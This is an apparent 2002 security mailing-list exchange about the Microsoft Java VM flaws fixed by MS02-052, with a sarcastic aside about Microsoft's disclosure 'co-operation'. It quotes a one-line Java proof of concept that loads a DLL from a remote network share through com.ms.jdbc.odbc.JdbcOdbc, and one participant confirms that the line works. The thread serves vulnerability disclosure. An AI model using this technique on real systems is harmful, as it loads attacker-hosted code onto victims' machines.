Technical information about the vulnerabilities fixed by MS-02-52

[guninski () guninski com (Georgi Guninski)]

Jouko Pynnonen wrote:
> On Mon, 23 Sep 2002, Georgi Guninski wrote:
>
>
> > Does
> > new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
> > work?
>
>
>
> Yes, seems to work, so there's another way to exploit this one. It 
> requires that browsing internet shares works, which may limit the systems 
> where it can be exploited. Although there were other Java vulnerabilities 
> involving the use of shares, I never came to think about this way. MS may 
> have thought of this, but of course they don't mention this kind of 
> things during the "co-operation".

Hehehehe - you don't expect microsoft to share info with you during 
"co-operation", do you?